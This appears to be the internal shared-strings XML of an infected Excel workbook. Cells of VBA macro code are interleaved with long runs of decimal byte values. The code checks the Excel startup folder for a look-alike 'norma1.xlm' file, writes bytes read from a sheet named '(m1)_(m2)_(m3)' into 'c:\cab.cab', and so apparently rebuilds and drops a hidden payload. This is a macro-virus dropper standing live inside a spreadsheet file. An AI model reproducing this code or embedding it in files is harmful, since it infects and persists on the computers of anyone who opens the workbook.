    <t xml:space="preserve">33 232 1 16 195 133 138 240 63 17 19 85 118 166 41 252 26 80 171 231 111 129 221 14 29 1 203 194 187 242 41 234 80 4 86 224 130 27 32 254 108 153 3 63 151 224 166 94 56 12 99 135 222 134 31 191 190 242 117 0 250 202 87 9 214 201 113 131 110 213 251 169 31 167 0 15 121 47 34 14 229 168 85 231 252 213 248 89 193 80 61 4 4 203 231 240 239 200 133 175 233 132 85 22 201 138 191 152 11 7 19 101 189 105 30 69 53 19 226 245 252 50 112 243 128 63 133 116 116 18 105 2 30 234 50 88 28 16 59 233 254 36 49 128 119 207 55 24 11 72 185 126 28 35 207 224 11 67 64 95 228 49 160 50 159 7 108 112 121 181 160 250 160 12 238 53 207 131 23 178 43 79 16 109 31 128 56 153 178 42 23 22 198 138 162 207 3 114 226 2 131 152 100 217 10 150 150 30 12 98 251 226 140 26 150 94 211 158 130 144 5 167 68 138 10 209 8 227 47 225 161 206 253 110 157 84 20 196 159 144 103 191 158 239 128 195 64 196 185 122 190 0 79 8 107 22 215 231 65 124 55 204 34 166 46 178 99 5 75 69 63 151 114 106 113 255 34 192 215 242 93 113 205 161 44 126 26 152 165 76 213 201 153 84 157 250 173 38 135 166 30 47 0 45 156 171 239 229 112 22 104 73 83 123 19 63 126 217 21 175 83 179 84 31 167 250 216 134 62 8 93 172 219 74 56 107 93 131 6 33 224 77 88 149 143 23 34 62 70 184 74 150 13 1 67 139 253 120 109 134 200 66 147 72 206 36 18 72 140 131 13 206 57 68 200 184 142 10 162 139 237 23 29 36 3 169 226 106 220 54 178 127 32 104 87 30 5 95 132 18 232 171 63 150 93 23 200 174 135 182 119 4 1 3 28 127 88 80 195 41 53 60 106 248 23 50 214 227 148 248 144 37 88 141 15 229 26 198 131 24 166 63 233 97 35 246 142 4 185 15 47 79 150 120 211 106 152 179 63 241 25 140 196 162 23 47 131 85 86 165 139 171 120 119 149 208 186 20 30 117 111 186 43 39 50 145 43 103 235 222 209 126 202 230 233 228 60 104 48 246 12 193 44 62 214 62 65 254 92 211 246 62 </t>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t xml:space="preserve">74 153 107 139 83 49 239 88 136 242 155 111 65 63 98 244 146 21 122 126 145 33 2 233 46 228 29 163 189 41 247 64 91 30 248 209 98 47 239 246 10 45 93 46 240 48 48 102 143 34 32 97 117 152 147 26 67 214 45 171 189 156 92 57 37 30 67 90 35 17 67 31 137 20 33 212 104 3 177 170 177 96 181 46 11 186 204 235 83 135 192 214 99 192 145 234 77 105 47 79 33 63 7 97 1 191 227 36 106 176 198 84 58 143 196 131 4 34 171 230 217 59 142 67 68 49 207 42 34 70 189 134 28 166 21 20 123 71 255 156 186 128 55 124 129 4 198 64 8 226 69 131 156 125 152 184 42 45 203 221 31 206 70 253 135 200 12 228 148 248 49 162 117 135 72 24 38 225 234 230 16 27 80 141 112 138 183 95 55 193 133 230 225 205 224 13 235 92 71 15 251 193 34 81 62 153 81 217 217 74 220 9 153 240 154 83 45 16 129 127 231 58 253 214 54 50 217 139 126 111 42 2 98 13 69 64 236 40 113 231 16 33 100 70 201 209 149 132 243 206 246 137 56 96 182 125 0 14 241 63 193 93 68 214 156 34 44 72 214 145 38 56 151 104 25 36 36 50 79 146 145 6 161 231 128 189 227 18 176 213 227 177 71 53 2 33 253 35 249 69 143 96 239 56 75 148 100 3 39 94 85 103 129 127 6 124 50 161 236 228 41 241 75 222 210 244 10 111 248 245 69 237 87 247 192 105 18 215 126 181 27 160 156 87 131 127 184 200 72 139 228 236 0 174 36 156 146 56 198 209 65 105 71 38 217 137 85 208 234 44 180 161 112 61 4 196 13 236 126 33 232 175 193 212 149 140 95 227 53 151 114 89 151 10 80 31 122 143 48 122 126 146 209 24 59 168 89 15 111 105 5 11 243 176 78 201 22 178 132 168 26 124 52 219 212 108 31 215 85 197 117 114 154 3 242 71 47 215 72 182 252 113 122 114 203 213 97 190 81 202 34 145 75 179 67 244 55 170 37 141 227 157 64 63 201 220 182 214 247 189 63 173 129 128 130 134 128 170 4 20 230 192 242 134 152 126 247 213 189 156 59 101 63 240 8 88 213 248 0 249 107 164 236 128 194 70 249 152 81 38 184 150 </t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t xml:space="preserve">165 151 94 210 197 103 134 111 130 219 24 248 57 153 84 70 216 22 94 57 199 48 131 186 24 29 93 0 126 81 140 97 152 238 6 248 16 129 20 252 44 131 238 135 126 203 80 87 86 103 118 151 143 238 44 167 187 124 22 216 182 179 220 162 244 51 202 128 177 249 251 215 54 143 173 159 194 53 176 104 165 223 162 12 88 8 214 143 174 97 117 155 56 62 192 40 39 51 7 167 175 63 9 224 109 232 111 66 127 21 250 139 208 159 131 254 52 244 131 132 254 178 39 63 85 203 158 250 20 32 6 136 1 94 4 120 17 32 20 31 79 141 2 28 3 56 6 48 5 48 5 48 13 48 29 99 99 198 159 105 71 153 212 164 36 116 194 240 40 244 52 116 97 33 140 120 185 134 198 163 125 221 132 186 233 207 38 231 153 17 160 241 58 105 128 40 38 113 99 210 109 233 88 219 234 116 70 254 226 148 252 109 87 46 189 148 134 115 247 56 201 185 227 191 6 41 59 157 6 191 147 247 49 97 222 71 49 185 143 71 22 26 247 65 144 187 59 225 185 7 250 41 232 93 62 230 150 161 206 114 102 3 108 188 145 108 251 211 105 219 18 186 50 243 83 119 244 133 69 249 210 144 254 193 105 152 221 211 240 0 105 234 174 190 96 148 47 9 185 246 3 247 64 88 185 126 111 17 192 50 232 37 208 75 161 151 65 175 132 190 25 250 3 78 227 94 160 240 123 170 8 96 33 192 66 128 14 128 14 128 2 64 1 32 15 144 7 200 1 228 0 178 0 217 235 239 197 148 79 4 126 59 161 255 0 250 171 206 105 247 226 99 128 234 105 247 96 188 95 127 7 211 199 174 187 55 125 229 197 125 30 202 72 128 137 192 73 86 209 38 178 231 246 45 50 210 137 34 179 80 146 11 86 151 137 156 36 24 99 63 188 201 28 251 208 21 55 99 175 123 37 39 121 168 125 144 225 223 87 96 78 21 65 189 197 132 232 6 165 223 174 92 24 13 76 37 25 78 35 201 152 138 216 246 142 35 25 31 246 54 129 22 41 215 48 238 145 127 133 55 158 158 116 85 80 186 189 189 128 68 0 43 184 11 53 75 223 91 8 49 158 228 150 7 141 50 146 87 141 60 251 33 </t>
  </si>
  <si>
    <t xml:space="preserve">226 78 31 64 1 62 217 123 64 46 65 27 132 160 50 161 67 21 60 145 208 13 111 84 250 239 134 55 42 61 169 89 223 33 222 168 107 35 219 24 57 127 32 50 113 64 206 138 156 112 170 1 190 125 191 145 186 66 242 189 1 202 46 146 208 190 155 73 104 73 241 51 171 2 206 177 255 148 94 167 206 106 232 27 31 158 31 87 206 9 74 92 200 201 184 87 82 73 130 7 82 46 242 196 75 115 65 247 74 51 131 122 151 100 1 253 224 247 193 41 66 240 207 164 1 25 223 200 244 119 249 217 100 47 164 2 255 76 138 230 157 41 10 234 14 37 44 80 232 164 244 64 178 215 34 223 151 236 173 144 22 116 121 172 165 185 82 129 94 37 128 5 50 177 141 244 128 55 69 10 157 254 178 21 214 92 51 112 67 192 150 133 106 35 104 139 102 222 114 135 25 68 67 214 58 119 66 206 159 10 132 170 205 136 201 107 201 129 169 93 70 206 177 18 158 253 184 142 228 142 35 183 18 122 25 84 59 70 215 166 98 149 43 88 35 87 129 204 35 69 84 225 180 148 19 249 78 174 204 242 172 102 17 47 119 130 18 129 183 77 169 94 129 25 116 39 212 170 148 93 121 207 72 80 132 46 170 20 226 51 185 198 82 155 148 215 153 93 174 123 133 17 82 127 175 95 13 249 73 33 96 120 34 171 114 229 44 197 43 88 180 134 254 108 91 57 108 162 181 154 188 0 110 204 171 135 232 201 44 68 188 46 91 132 167 114 37 60 70 73 235 204 124 160 66 186 161 203 171 131 124 110 132 109 80 94 121 103 217 109 86 109 169 59 204 203 121 145 176 158 43 91 251 179 115 181 194 16 29 210 73 42 81 109 124 156 224 201 140 196 146 115 129 126 32 201 126 160 28 108 91 19 64 186 18 240 156 213 227 1 38 45 157 89 197 97 30 114 51 200 115 254 82 70 241 166 145 16 72 22 253 84 179 3 66 105 51 7 63 248 4 96 52 179 228 149 34 175 239 80 153 82 6 74 12 163 144 201 55 117 151 12 208 198 0 155 25 8 134 232 198 213 107 134 225 16 121 54 177 75 61 127 217 54 82 77 228 47 1 0 198 201 83 53 232 94 209 161 174 249 0 80 </t>
  </si>
  <si>
    <t xml:space="preserve">58 23 144 28 65 46 125 225 117 147 134 69 200 246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23 172 123 37 65 105 253 188 161 217 73 136 42 36 68 125 195 176 248 230 37 100 64 36 3 115 141 129 232 217 173 50 177 117 78 53 200 48 43 137 198 140 177 3 169 173 182 107 251 246 179 218 231 102 94 93 99 38 214 129 96 107 43 164 214 163 36 181 134 164 183 52 54 153 244 218 147 101 183 65 126 29 240 227 15 11 205 130 65 230 167 100 169 109 132 243 10 13 209 20 1 171 43 72 85 48 12 249 196 215 178 239 28 63 126 163 128 120 2 39 202 38 101 194 149 24 40 0 234 251 179 151 115 205 34 161 158 231 92 103 209 62 97 117 35 171 202 99 97 70 109 100 67 116 77 0 175 51 235 73 119 31 228 211 109 91 81 144 111 26 239 229 104 153 43 46 103 71 230 16 83 200 70 27 57 52 92 252 235 100 47 163 214 167 164 165 232 12 250 48 241 7 171 242 201 66 228 120 198 172 27 126 195 70 164 37 104 200 125 170 117 81 228 142 92 153 209 189 169 59 181 175 146 189 17 121 206 117 149 238 8 201 222 149 112 154 146 57 208 168 145 55 224 45 89 206 131 241 147 226 21 5 217 232 105 153 187 185 54 53 242 15 240 90 156 96 122 201 119 153 254 63 85 121 101 193 129 33 146 71 233 242 24 126 252 170 201 129 55 45 47 64 229 28 212 32 196 24 91 243 136 125 1 41 156 7 72 41 183 57 181 18 130 158 38 43 170 96 133 145 249 194 50 200 215 247 217 208 70 195 223 89 193 223 73 12 42 47 36 7 27 199 192 43 249 194 226 229 150 122 211 64 50 148 21 76 194 208 121 242 149 164 26 28 221 202 49 136 30 228 99 137 235 44 72 71 173 79 119 101 151 110 151 230 149 182 72 246 210 125 246 232 34 144 224 91 52 4 22 141 124 0 56 65 107 220 91 57 196 0 79 88 66 244 61 93 229 116 249 29 125 246 142 79 128 93 247 47 205 180 213 254 139 184 146 218 252 120 139 180 77 193 197 146 87 193 115 165 219 21 60 75 42 170 176 71 95 37 101 70 125 218 30 61 4 15 3 222 52 241 128 202 81 </t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t xml:space="preserve">167 246 51 99 240 201 233 131 130 246 47 201 132 71 14 43 71 61 218 15 146 9 139 220 170 156 191 170 92 72 43 71 45 237 39 72 53 162 29 56 76 156 122 116 80 174 203 27 28 105 33 74 128 239 147 42 42 164 229 10 206 147 230 40 56 75 246 36 223 141 203 238 200 113 207 72 13 76 175 174 79 201 203 51 110 183 253 130 254 142 174 143 148 102 134 111 156 28 62 65 254 189 107 100 49 12 195 82 41 219 117 122 100 46 60 71 142 71 70 102 3 108 126 17 144 12 39 13 110 232 187 55 194 141 15 130 67 112 191 23 102 161 188 157 135 188 14 221 122 16 116 69 221 195 171 91 88 181 80 221 194 169 91 138 212 10 243 27 14 202 39 5 8 84 231 174 207 93 73 87 220 253 31 193 253 245 104 129 241 165 240 50 178 187 143 75 249 201 117 188 34 229 122 148 1 214 221 219 118 81 251 14 42 81 52 17 165 66 206 196 103 22 92 144 130 50 5 217 204 250 196 110 126 97 44 205 118 95 145 10 209 184 251 191 129 223 13 130 174 238 102 213 221 188 186 155 83 151 171 187 139 80 191 81 92 147 162 131 208 75 34 4 68 118 123 135 147 216 196 22 46 122 214 222 145 79 110 242 178 85 230 149 109 28 56 177 45 35 54 99 0 244 57 73 244 217 246 91 194 77 21 40 36 175 26 207 168 130 37 89 84 116 208 152 173 104 37 21 83 37 252 50 67 1 247 177 112 126 172 100 125 241 80 172 228 39 195 80 54 41 183 82 202 255 180 247 53 80 81 92 89 194 213 116 129 5 52 118 43 16 209 104 210 70 204 196 33 49 196 246 7 166 197 116 11 173 128 160 141 45 221 33 138 74 164 13 116 16 152 166 74 193 129 164 73 193 124 20 149 90 157 196 179 155 61 51 155 9 209 153 117 146 239 59 155 179 153 207 207 153 100 147 198 206 128 154 108 98 116 39 58 154 47 226 140 187 83 78 185 9 70 3 173 33 212 119 239 171 106 108 147 56 51 187 103 206 126 231 236 225 157 243 120 127 247 189 119 223 223 125 247 222 119 139 30 48 149 114 163 34 37 46 217 0 48 5 176 188 97 36 24 152 224 113 1 155 11 246 198 101 117 98 </t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t xml:space="preserve">86 117 193 15 226 178 240 93 64 41 45 120 46 46 11 53 236 202 178 2 41 46 235 105 204 202 46 216 19 151 133 58 15 101 90 193 179 152 149 162 101 245 162 0 75 16 9 48 234 169 42 129 68 171 54 43 12 14 189 2 114 224 136 236 199 49 162 206 58 25 229 218 204 197 64 181 64 64 17 55 100 211 98 154 27 192 243 51 81 32 244 30 198 191 44 142 22 198 138 113 62 108 178 15 180 208 249 22 238 115 201 84 178 89 50 73 152 11 39 24 178 88 32 123 17 143 237 92 254 156 131 132 182 114 137 242 124 224 132 196 37 168 121 178 169 189 73 223 137 176 211 151 23 176 134 213 94 249 159 81 111 37 177 73 6 69 150 232 127 194 219 196 45 223 53 162 170 226 112 149 253 170 176 4 245 82 32 178 38 203 125 255 142 123 161 0 91 200 187 155 205 175 244 201 207 101 225 67 85 149 43 244 112 1 123 79 165 124 233 115 85 181 71 170 132 36 2 30 68 112 159 186 84 70 243 207 42 32 248 85 198 47 243 238 230 142 85 171 4 9 249 135 88 46 204 193 184 112 215 150 205 131 137 7 0 83 60 14 27 117 34 113 11 246 143 3 71 249 230 16 192 214 209 0 227 245 168 153 121 48 79 125 168 82 19 150 28 197 77 50 158 151 197 38 136 81 201 21 117 75 174 49 183 199 227 147 203 9 79 129 212 71 162 123 220 114 201 231 56 40 254 237 44 251 85 192 144 145 79 92 6 12 98 240 162 11 128 190 239 246 250 228 25 164 214 24 255 118 70 177 64 52 113 91 54 239 71 85 156 70 189 196 114 96 66 50 60 94 126 46 37 114 22 164 96 131 4 107 88 200 110 149 101 132 101 112 144 132 14 83 40 239 30 174 168 215 109 112 132 110 220 195 46 232 58 201 206 55 31 58 57 242 116 77 155 131 162 89 147 106 232 30 97 147 122 45 61 119 172 114 144 248 175 73 92 121 143 36 232 208 189 212 42 108 96 149 67 41 36 57 137 164 184 215 226 48 31 58 59 194 199 55 146 216 155 213 115 215 42 232 197 202 38 119 33 151 117 35 153 123 183 235 36 103 44 86 24 210 212 118 21 216 195 44 42 148 71 153 187 134 0 207 </t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">94 11 194 38 34 156 17 40 60 201 199 131 21 143 188 88 153 161 38 12 186 80 99 79 217 206 133 242 54 113 180 163 80 25 69 148 238 31 137 24 184 249 168 123 202 98 211 66 173 134 123 36 183 129 163 197 35 138 81 0 209 25 200 249 201 252 202 44 243 190 35 66 101 214 7 138 120 106 13 112 126 83 11 17 145 129 164 77 171 84 195 26 238 106 175 5 240 44 229 59 178 40 46 5 81 121 24 80 97 191 131 218 103 118 33 0 206 140 27 98 146 54 63 218 220 152 227 38 208 8 185 170 193 113 233 17 32 143 177 9 83 13 151 102 96 82 101 141 252 183 96 57 50 128 254 169 84 117 164 162 162 239 226 46 36 129 226 3 101 91 113 55 217 206 1 37 132 141 202 217 212 95 139 195 246 171 44 28 95 132 192 209 42 247 169 153 197 200 67 68 237 95 152 187 254 128 87 3 41 195 39 151 75 248 34 202 71 13 230 110 36 26 176 135 76 90 125 115 215 17 124 128 203 191 75 28 96 167 58 28 219 243 179 184 235 90 240 89 206 128 88 80 4 205 125 16 245 120 28 30 143 219 235 241 8 69 217 139 213 211 162 108 87 216 69 149 242 161 207 180 35 83 148 109 97 231 121 60 149 168 198 206 6 40 245 52 112 171 83 137 46 187 229 15 120 78 54 101 91 128 121 179 120 213 76 7 162 23 81 60 124 52 129 43 179 127 129 36 35 134 49 187 60 239 110 113 16 136 121 94 22 247 5 254 25 201 25 116 136 114 165 188 238 51 253 56 115 180 109 68 73 173 244 121 229 41 159 146 219 223 167 102 46 199 218 3 200 40 33 229 70 65 238 114 17 170 115 235 112 70 228 12 173 42 8 102 76 224 78 249 239 46 33 50 75 144 165 24 36 108 155 21 181 136 223 71 72 251 112 203 172 16 10 52 83 213 129 85 137 41 125 8 195 15 48 137 88 166 252 86 130 17 2 127 182 9 250 218 14 188 232 74 216 117 191 210 94 167 139 186 195 230 174 95 96 60 87 170 163 15 83 12 54 37 205 94 216 158 32 14 231 19 89 168 99 253 91 7 118 35 63 140 248 116 93 33 143 65 108 30 175 245 47 76 145 122 72 247 253 45 89 161 </t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t xml:space="preserve">173 208 61 163 14 56 18 83 68 51 31 102 58 251 73 231 23 97 87 107 45 181 191 174 36 137 36 102 131 125 243 228 42 209 136 178 223 210 222 114 106 164 223 192 46 4 94 134 75 5 44 41 77 177 120 151 56 40 190 255 85 149 148 152 42 48 0 223 83 76 175 118 225 155 249 120 251 47 109 231 180 193 46 63 163 74 139 207 112 229 221 231 6 86 209 157 92 98 96 228 17 37 69 140 20 19 153 47 252 57 52 188 129 44 20 175 170 236 12 223 68 55 38 162 158 18 86 224 130 38 133 214 210 14 197 204 71 141 112 56 214 210 140 66 195 223 80 33 255 133 177 253 135 42 65 92 205 116 35 83 77 158 63 139 34 182 112 128 66 17 187 14 153 18 243 190 48 244 81 75 90 221 143 114 51 155 41 179 70 242 64 98 142 9 210 91 241 89 35 28 129 91 55 242 46 81 12 250 42 81 178 168 123 49 23 74 225 190 62 49 151 162 170 225 228 136 255 10 87 80 89 54 61 234 164 147 0 187 195 120 56 88 51 44 23 3 23 147 69 72 56 140 66 63 190 65 138 184 176 129 241 186 131 208 64 173 186 4 149 15 250 99 10 148 88 225 198 23 155 77 252 184 202 46 4 1 32 155 189 79 90 188 83 52 189 38 148 129 140 80 108 226 219 95 163 41 110 122 157 1 121 131 162 215 24 25 63 35 80 55 188 198 40 145 218 61 137 148 38 215 32 55 110 11 215 138 105 152 238 108 163 177 35 206 34 86 152 196 245 166 252 10 134 75 36 184 69 60 21 175 215 194 101 169 164 232 17 96 103 133 53 140 80 72 11 79 152 170 54 30 161 169 119 223 245 22 46 202 125 164 48 55 151 240 246 12 14 125 76 172 54 1 225 30 117 144 65 154 187 241 82 23 224 194 112 161 150 28 110 6 161 112 76 108 49 137 223 99 112 4 53 146 105 39 223 190 135 166 88 151 183 82 122 194 162 110 216 67 87 111 134 22 82 195 172 173 117 57 64 121 228 159 17 158 154 134 82 175 71 254 152 36 24 168 22 48 136 69 123 24 185 6 31 215 232 61 66 161 9 234 50 80 1 138 196 197 123 148 62 242 5 136 50 155 140 68 201 196 198 3 170 71 </t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
    <t xml:space="preserve">126 65 171 95 77 178 99 139 82 9 171 194 136 11 68 231 108 183 232 204 114 203 109 58 16 140 176 15 95 117 128 64 177 105 176 226 223 230 11 138 65 50 51 112 115 235 198 208 208 1 174 106 170 79 6 82 86 165 75 156 184 233 244 167 100 242 14 129 92 166 88 201 216 142 29 110 133 233 179 91 216 84 56 65 206 2 84 209 180 95 241 138 87 64 132 176 255 53 22 153 187 103 3 104 172 51 115 151 76 116 61 92 154 222 161 185 235 52 46 212 13 236 213 220 117 133 188 50 108 2 36 201 197 237 6 89 130 220 220 80 33 93 207 223 183 13 164 84 217 103 70 9 82 203 242 185 165 127 194 80 94 4 187 218 81 197 71 151 239 92 160 149 184 229 187 81 165 18 213 82 188 108 15 24 141 209 186 189 208 130 79 254 60 131 72 202 82 247 86 100 154 89 210 170 193 140 221 99 134 207 45 211 19 137 186 102 82 122 117 42 108 183 67 237 48 38 45 219 45 95 128 156 58 11 240 170 58 92 49 129 75 34 45 223 191 69 185 87 114 49 18 169 128 218 134 165 242 179 102 242 226 179 52 112 77 59 219 110 237 81 98 243 177 72 157 3 70 123 171 254 10 14 101 59 36 56 67 132 159 207 66 132 226 231 183 98 16 48 236 111 38 244 180 14 254 226 167 31 143 68 250 176 64 50 133 250 218 73 216 3 196 45 3 25 194 28 183 169 243 6 126 31 18 156 194 135 51 20 25 78 50 217 204 25 98 165 9 223 144 188 162 211 34 126 150 243 93 147 248 232 24 127 100 204 215 255 137 89 124 79 220 61 86 127 140 134 149 94 35 116 140 73 207 24 138 0 51 161 250 154 80 62 44 154 210 129 238 9 229 81 238 169 254 235 116 224 225 146 45 66 185 201 254 254 78 35 242 0 101 233 180 189 44 157 225 138 129 15 231 175 91 91 102 163 38 34 116 234 83 169 204 64 143 158 158 219 254 106 209 120 50 151 3 189 206 205 87 178 249 254 33 189 24 160 117 136 55 94 69 29 29 0 37 33 80 27 13 45 50 98 123 58 45 144 40 13 81 198 8 162 95 27 3 200 136 95 244 171 244 58 94 125 120 167 49 240 240 22 96 216 248 11 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">128 215 101 115 247 139 40 210 194 57 45 31 35 24 10 149 209 146 71 237 199 1 205 157 137 2 140 249 184 177 122 76 252 2 26 192 234 246 27 59 19 196 27 246 247 217 39 196 242 168 88 65 219 43 226 176 255 37 65 239 15 4 183 147 115 55 220 196 126 26 193 94 47 142 97 127 114 238 190 91 176 175 160 73 147 140 88 66 11 165 90 156 22 75 24 161 148 17 43 163 124 199 101 138 75 206 239 48 153 187 4 164 123 229 195 146 233 122 12 18 227 0 38 0 124 41 45 64 11 165 180 189 148 225 182 245 150 77 161 121 213 218 83 110 30 239 239 129 120 203 252 80 135 153 226 166 190 142 136 136 239 159 82 160 219 228 153 19 41 169 232 213 162 228 44 101 1 1 178 72 235 134 72 137 6 85 69 67 58 182 58 93 4 239 228 60 17 38 213 53 44 204 18 54 165 143 169 32 60 221 192 243 143 219 14 175 219 243 68 146 106 64 125 98 65 221 86 124 208 54 27 139 77 175 83 32 225 214 161 44 234 169 0 22 133 148 147 42 250 228 36 187 25 146 212 107 58 44 252 129 30 236 76 3 130 244 120 113 161 22 45 182 132 218 10 97 78 248 173 244 56 201 225 91 25 149 107 240 192 129 104 54 169 167 73 150 218 108 185 245 17 153 108 122 49 147 108 121 58 212 63 148 32 30 37 128 57 71 165 178 105 151 43 164 226 140 10 183 108 153 78 88 109 184 23 212 52 132 183 39 34 200 78 35 47 103 136 105 88 85 72 195 195 164 160 90 123 63 22 9 75 16 217 152 238 1 142 74 92 55 30 47 116 228 147 150 63 173 25 180 72 197 51 248 11 195 112 46 96 171 149 192 166 233 152 202 191 167 158 250 132 47 143 170 2 119 77 177 192 54 1 49 205 54 114 74 134 36 92 19 125 216 147 120 198 126 94 168 102 90 102 138 107 104 209 62 175 60 58 111 60 245 125 46 149 143 100 216 171 199 160 32 248 123 8 185 54 241 172 253 12 130 101 222 2 150 8 96 202 191 217 207 112 85 0 212 50 141 255 30 3 162 22 228 1 164 242 239 88 239 222 88 189 52 82 70 224 63 1 248 169 114 30 218 71 157 233 62 7 133 108 134 </t>
  </si>
  <si>
    <t>n=1</t>
  </si>
  <si>
    <t xml:space="preserve">71 62 139 22 41 226 26 139 96 16 11 45 124 158 74 212 179 102 200 20 230 16 44 11 45 162 133 191 161 10 149 99 108 134 248 204 94 92 54 177 125 111 81 12 145 101 162 150 213 92 52 175 50 58 143 187 134 166 11 82 113 81 234 135 34 119 141 155 33 254 0 101 98 213 53 6 133 124 63 45 142 207 203 79 61 205 94 18 225 92 30 183 169 26 113 137 17 150 242 107 98 25 180 251 30 151 166 119 19 176 66 39 91 186 143 181 39 126 112 97 181 50 42 2 192 134 235 180 152 146 3 244 231 10 208 158 254 113 122 45 63 254 240 147 112 240 55 219 71 205 93 168 12 208 15 73 13 28 144 142 156 184 19 49 38 181 231 209 163 167 132 234 203 243 54 245 20 9 224 199 205 92 30 218 218 148 95 158 155 170 60 20 127 46 8 172 244 12 217 161 163 167 230 206 28 55 67 53 46 85 7 94 67 195 22 129 40 28 224 221 52 223 17 165 144 42 193 121 221 205 0 65 50 119 237 35 231 248 154 216 126 133 150 76 87 132 221 244 55 28 225 218 222 178 36 154 31 135 35 156 218 177 96 188 63 212 145 74 245 64 14 151 74 142 162 248 222 169 79 147 237 19 81 192 39 185 189 167 72 121 48 14 48 77 90 27 59 182 201 223 163 17 227 55 8 182 144 253 38 201 254 36 121 25 144 26 52 130 18 82 132 178 105 99 104 36 20 21 185 97 227 7 210 90 3 102 45 26 131 245 17 167 118 31 147 218 12 194 10 110 150 125 14 110 121 110 58 180 101 39 135 148 155 162 223 53 144 35 48 210 74 90 83 60 147 35 144 134 247 13 136 67 170 189 159 203 149 138 4 55 218 147 170 75 240 96 248 98 231 146 133 115 105 31 100 107 120 237 114 34 23 152 94 27 163 117 111 59 97 129 25 56 69 90 5 105 113 167 118 215 217 7 133 85 22 246 219 1 186 14 37 132 58 188 178 128 225 109 214 75 76 28 90 248 248 226 15 191 45 172 204 224 215 50 170 176 66 120 146 86 19 73 23 171 44 192 204 163 62 137 40 4 200 253 230 19 191 107 17 157 140 237 92 119 24 246 211 16 8 165 98 36 240 112 125 24 119 224 163 82 87 46 </t>
  </si>
  <si>
    <t>m=instr(hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">217 130 174 49 193 193 8 14 26 248 151 82 152 158 47 2 116 255 239 205 198 54 19 97 146 235 144 200 233 184 160 145 6 170 87 159 195 73 255 27 252 228 210 126 99 215 114 105 181 133 47 142 170 124 207 101 184 221 85 169 103 12 130 65 199 216 48 4 48 133 61 99 32 56 9 197 244 96 72 134 12 204 76 196 102 165 226 97 251 241 157 131 168 69 88 103 74 68 181 94 192 176 5 192 4 39 35 149 154 132 98 70 112 210 124 237 11 69 148 240 198 11 184 198 189 171 10 123 143 142 247 119 133 129 244 244 172 45 228 140 201 173 52 33 179 226 59 167 254 0 215 143 155 17 35 154 2 15 152 112 219 73 237 237 229 176 5 152 49 59 195 90 97 100 43 11 90 57 228 204 248 235 233 193 57 252 245 236 93 89 154 202 24 217 228 136 72 255 58 3 64 247 99 70 164 243 58 190 145 5 167 119 94 63 78 197 52 221 12 126 190 154 114 83 201 140 156 60 255 142 106 3 234 246 11 242 204 100 0 46 113 153 180 151 72 86 71 90 102 143 56 104 52 209 9 51 202 21 88 147 28 67 127 212 104 28 208 20 237 27 128 34 172 230 7 172 157 215 137 132 245 43 165 240 77 172 229 149 207 254 78 147 212 108 186 164 38 153 180 135 52 210 168 96 128 102 51 226 5 182 105 208 186 241 67 69 238 255 125 162 120 94 179 117 196 231 1 175 246 60 224 107 89 255 205 175 3 252 242 135 84 110 169 206 123 146 7 14 238 46 94 166 88 75 49 203 20 115 233 158 192 53 133 241 4 62 87 140 158 192 136 154 217 138 2 216 20 97 118 174 45 188 241 118 202 127 50 229 94 205 28 199 215 82 25 103 137 179 124 66 151 62 133 216 213 24 216 101 64 106 217 69 49 86 251 110 91 56 231 40 107 41 97 153 18 46 221 141 61 187 177 103 247 205 158 121 83 174 122 123 163 164 120 59 163 217 226 81 126 232 110 24 239 132 149 81 63 109 144 232 126 214 40 82 145 111 170 174 91 157 250 204 255 192 102 103 240 227 67 226 199 187 210 110 121 78 181 169 144 187 235 219 246 57 228 213 53 205 35 95 142 130 56 18 173 234 86 185 28 111 128 137 </t>
  </si>
  <si>
    <t>do while m&gt;0</t>
  </si>
  <si>
    <t xml:space="preserve">103 85 197 40 100 222 195 23 224 19 47 197 206 244 202 231 117 195 215 12 229 23 112 137 251 228 99 154 113 158 102 28 10 3 138 122 125 1 163 77 221 172 219 162 22 197 217 162 62 56 226 48 241 108 154 91 174 252 23 221 4 213 176 154 31 207 104 159 65 96 212 197 175 202 63 248 141 170 146 68 21 159 253 42 21 51 65 125 3 27 143 104 186 109 114 114 101 225 2 42 32 97 113 186 195 112 172 216 52 190 196 196 12 58 201 35 171 50 13 18 180 228 204 128 2 200 66 177 6 200 4 95 67 195 70 139 155 213 160 17 56 230 175 76 108 47 76 44 63 228 136 244 13 239 34 226 184 25 31 171 213 19 56 90 26 197 228 24 143 61 27 120 67 143 237 156 119 164 63 228 27 116 93 52 161 168 88 45 179 201 112 171 12 184 84 139 146 26 242 171 212 160 235 50 10 107 135 145 200 116 31 229 166 141 252 202 193 49 249 137 76 43 8 227 116 168 92 13 5 140 98 255 230 121 3 57 17 246 129 98 118 110 49 155 121 243 12 10 115 200 251 234 252 4 124 143 184 6 25 97 197 162 69 28 104 73 123 141 80 7 151 133 143 90 216 123 249 168 149 205 226 163 185 108 10 31 117 112 175 11 220 176 146 57 232 26 198 113 163 73 233 48 17 36 141 66 245 240 47 169 41 136 14 77 81 243 142 191 69 78 243 209 167 150 128 48 254 14 251 109 96 148 231 116 94 71 213 22 187 28 66 35 10 192 141 32 244 12 186 162 164 157 101 16 65 109 176 178 80 224 162 202 2 0 1 145 156 157 5 33 8 203 108 178 253 56 59 245 210 10 13 30 101 117 196 49 170 105 66 77 111 226 83 73 247 32 155 46 166 61 15 99 26 253 96 94 121 6 204 27 217 